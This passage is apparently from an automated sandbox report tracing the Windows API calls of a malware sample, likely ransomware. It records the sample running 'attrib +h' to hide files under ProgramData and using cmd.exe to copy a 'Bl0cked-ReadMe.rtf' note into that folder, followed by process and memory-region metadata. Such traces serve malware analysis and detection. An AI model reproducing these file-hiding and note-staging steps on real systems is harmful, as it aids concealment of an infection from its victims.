lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.377] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.378] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.379] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.493] _close (_FileHandle=4) returned 0 [0127.493] FindNextFileW (in: hFindFile=0x36e6b8, lpFindFileData=0x18ed70 | out: lpFindFileData=0x18ed70) returned 0 [0127.493] GetLastError () returned 0x12 [0127.493] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.494] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.496] _close (_FileHandle=3) returned 0 [0127.496] GetConsoleTitleW (in: lpConsoleTitle=0x18f1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.496] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.496] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.496] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.497] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.497] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.497] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.497] GetConsoleTitleW (in: lpConsoleTitle=0x18ef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.497] InitializeProcThreadAttributeList (in: lpAttributeList=0x18edc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ee8c | out: lpAttributeList=0x18edc4, lpSize=0x18ee8c) returned 1 [0127.497] UpdateProcThreadAttribute (in: lpAttributeList=0x18edc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18edc4, lpPreviousValue=0x0) returned 1 [0127.497] GetStartupInfoW (in: lpStartupInfo=0x18ed80 | out: lpStartupInfo=0x18ed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.497] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.497] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ee6c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessInformation=0x18ee6c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xffc, dwThreadId=0x3c4)) returned 1 [0127.499] CloseHandle (hObject=0x50) returned 1 [0127.499] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.499] GetEnvironmentStringsW () returned 0x372dd0* [0127.499] FreeEnvironmentStringsW (penv=0x372dd0) returned 1 [0127.499] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0127.573] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18ed60 | out: lpExitCode=0x18ed60*=0x0) returned 1 [0127.573] CloseHandle (hObject=0x4c) returned 1 [0127.573] _vsnwprintf (in: _Buffer=0x18eea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ed6c | out: _Buffer="00000000") returned 8 [0127.573] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.573] GetEnvironmentStringsW () returned 0x372dd0* [0127.573] FreeEnvironmentStringsW (penv=0x372dd0) returned 1 [0127.573] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.573] GetEnvironmentStringsW () returned 0x372dd0* [0127.573] FreeEnvironmentStringsW (penv=0x372dd0) returned 1 [0127.573] DeleteProcThreadAttributeList (in: lpAttributeList=0x18edc4 | out: lpAttributeList=0x18edc4) [0127.573] GetConsoleTitleW (in: lpConsoleTitle=0x18f1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.573] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.573] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.573] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0x36e6b8 [0127.574] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0xffffffff [0127.574] GetLastError () returned 0x2 [0127.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ea44) returned 0x36e6b8 [0127.574] FindClose (in: hFindFile=0x36e6b8 | out: hFindFile=0x36e6b8) returned 1 [0127.574] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.574] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.574] GetConsoleTitleW (in: lpConsoleTitle=0x18ef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.574] InitializeProcThreadAttributeList (in: lpAttributeList=0x18edc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ee8c | out: lpAttributeList=0x18edc4, lpSize=0x18ee8c) returned 1 [0127.574] UpdateProcThreadAttribute (in: lpAttributeList=0x18edc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18edc4, lpPreviousValue=0x0) returned 1 [0127.574] GetStartupInfoW (in: lpStartupInfo=0x18ed80 | out: lpStartupInfo=0x18ed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.575] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.575] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ee6c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessInformation=0x18ee6c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x80c, dwThreadId=0x81c)) returned 1 [0127.576] CloseHandle (hObject=0x4c) returned 1 [0127.576] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.576] GetEnvironmentStringsW () returned 0x373808* [0127.576] FreeEnvironmentStringsW (penv=0x373808) returned 1 [0127.576] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0127.611] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18ed60 | out: lpExitCode=0x18ed60*=0x0) returned 1 [0127.611] CloseHandle (hObject=0x50) returned 1 [0127.611] _vsnwprintf (in: _Buffer=0x18eea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ed6c | out: _Buffer="00000000") returned 8 [0127.611] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.611] GetEnvironmentStringsW () returned 0x373808* [0127.611] FreeEnvironmentStringsW (penv=0x373808) returned 1 [0127.611] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.611] GetEnvironmentStringsW () returned 0x373808* [0127.611] FreeEnvironmentStringsW (penv=0x373808) returned 1 [0127.611] DeleteProcThreadAttributeList (in: lpAttributeList=0x18edc4 | out: lpAttributeList=0x18edc4) [0127.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.611] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.612] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.612] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.612] SetConsoleInputExeNameW () returned 0x1 [0127.612] GetConsoleOutputCP () returned 0x1b5 [0127.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.612] exit (_Code=0) Process: id = "76" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xfc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10076 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10077 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10078 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10079 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10080 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10081 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10082 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10083 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10084 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10085 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10096 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10097 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10098 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10099 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10100 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10101 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10102 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10103 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10104 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10105 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10106 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10107 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10108 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10109 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10110 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10111 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10112 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10113 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10114 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10115 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 10116 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 10117 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 10118 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 10119 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 132 os_tid = 0xfc8 [0127.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9d4 | out: lpSystemTimeAsFileTime=0x1cf9d4*(dwLowDateTime=0x85ab55a0, dwHighDateTime=0x1d440a9)) [0127.063] GetCurrentProcessId () returned 0xfc4 [0127.063] GetCurrentThreadId () returned 0xfc8 [0127.063] GetTickCount () returned 0x28d41 [0127.063] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9cc | out: lpPerformanceCount=0x1cf9cc*=18385202338) returned 1 [0127.064] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.064] __set_app_type (_Type=0x1) [0127.064] __p__fmode () returned 0x76b331f4 [0127.064] __p__commode () returned 0x76b331fc [0127.064] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.064] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 